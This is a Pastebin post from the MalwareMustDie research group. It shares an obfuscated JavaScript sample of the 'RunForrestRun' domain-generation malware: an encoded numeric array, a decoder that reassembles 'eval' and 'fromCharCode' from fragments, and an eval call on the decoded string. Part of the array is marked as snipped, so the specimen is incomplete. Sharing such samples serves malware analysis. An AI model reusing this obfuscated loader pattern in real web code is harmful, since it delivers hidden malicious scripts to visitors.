Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- // MalwareMustDie
- // DGA (PseudoRandom Domain) RunForrestRun, New Obfuscation
- // Decoding step 1 @unixfreaxjp /malware/checkdomains]$ date
- // Sat Nov 2 19:00:15 JST 2013
- try {
- prototype % 2;
- }
- catch (asd){
- x = 2;
- }
- try {
- q = document[(x) ? "c" + "r" : 2 + "e" + "a" + "t" + "e" + "E" + "l"+ "e" + "m" + ((f) ? "e" + "n" + "t" : "")]("p");
- q.appendChild(q + "");
- }
- catch (fwbewe){
- i = 0;
- try {
- prototype * 5;
- }
- catch (z){
- fr = "fromChar";
- f = [510, 702, 550, 594, 580, 630, 555, 660, 160, 660, 505, 720, 580, 492, 485, 660,
- 500, 666, 545, 468, 585, 654, 490, 606, 570, 240, 205, 738, 50, 192, 160, 192, 160,
- 708, 485, 684, 160, 624, 525, 192, 305, 192, 580, 624, 525, 690, 230, 690, 505, 606,
- 500, 192, 235, 192, 580, 624, 525, 690, 230, 486, 295, 60, 160, 192, 160, 192, 590,
- 582, 570, 192, 540, 666, 160, 366, 160, 696, 520, 630, 575, 276, 575, 606, 505, 600,
- 160, 222, 160, 696, 520, 630, 575, 276, 405, 354, 50, 192, 160, 192, 160, 708, 485,
- 684, 160, 696, 505, 690, 580, 192, 305, 192, 580, 624, 525, 690, 230, 390, 160, 252,
- 160, 648, 555, 192, 225, 192, 580, 624, 525, 690, 230, 492, 160, 252, 160, 624, 525,
- 354, 50, 192, 160, 192, 160, 630, 510, 240, 580, 606, 575, 696, 160, 372, 160, 288,
- 205, 738, 50, 192, 160, 192, 160, 192, 160, 192, 160, 696, 520, 630, 575, 276, 575,
- 606, 505, 600, 160, 366, 160, 696, 505, 690, 580, 354, 50, 192, 160, 192, 160, 750,
- 160, 606, 540, 690, 505, 192, 615, 60, 160, 192, 160, 192, 160, 192, 160, 192, 580,
- (((( SNIPPED FOR SECURITY PURPOSE ))))
- 485, 654, 505, 258, 170, 282, 570, 702, 550, 612, 555, 684, 505, 690, 580, 684, 585,
- 660, 315, 690, 525, 600, 305, 588, 555, 696, 550, 606, 580, 300, 170, 246, 295, 192,
- 50, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 630, 510, 684, 545,
- 276, 575, 696, 605, 648, 505, 276, 595, 630, 500, 696, 520, 192, 305, 192, 170, 288,
- 560, 720, 170, 354, 160, 60, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160,
- 192, 525, 612, 570, 654, 230, 690, 580, 726, 540, 606, 230, 624, 505, 630, 515, 624,
- 580, 192, 305, 192, 170, 288, 560, 720, 170, 354, 160, 60, 160, 192, 160, 192, 160,
- 192, 160, 192, 160, 192, 160, 192, 525, 612, 570, 654, 230, 690, 580, 726, 540, 606,
- 230, 708, 525, 690, 525, 588, 525, 648, 525, 696, 605, 192, 305, 192, 170, 624, 525,
- 600, 500, 606, 550, 204, 295, 192, 50, 192, 160, 192, 160, 192, 160, 192, 160, 192,
- 160, 192, 160, 600, 555, 594, 585, 654, 505, 660, 580, 276, 490, 666, 500, 726, 230,
- 582, 560, 672, 505, 660, 500, 402, 520, 630, 540, 600, 200, 630, 510, 684, 545, 246,
- 295, 60, 160, 192, 160, 192, 160, 192, 160, 192, 625, 60, 160, 192, 160, 192, 625, 594
- , 485, 696, 495, 624, 200, 606, 205, 738, 625, 60, 625, 264, 160, 318, 240, 288, 205,
- 354];
- v = "eva";
- }
- if (v)e = window[v + "l"];
- w = f;
- s = [];
- r = String;
- z = ((e) ? "Code" : "");
- for (;
- 1776 - 5 + 5 > i; i += 1){
- j = i;
- if (e)s = s + r[fr + ((e) ? "Code" : 12)]((w[j] / (5 + e("j%2"))));
- }
- if (f)e(s);
- }
- //-----
- // #MalwareMustDie!! @unixfreaxjp
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement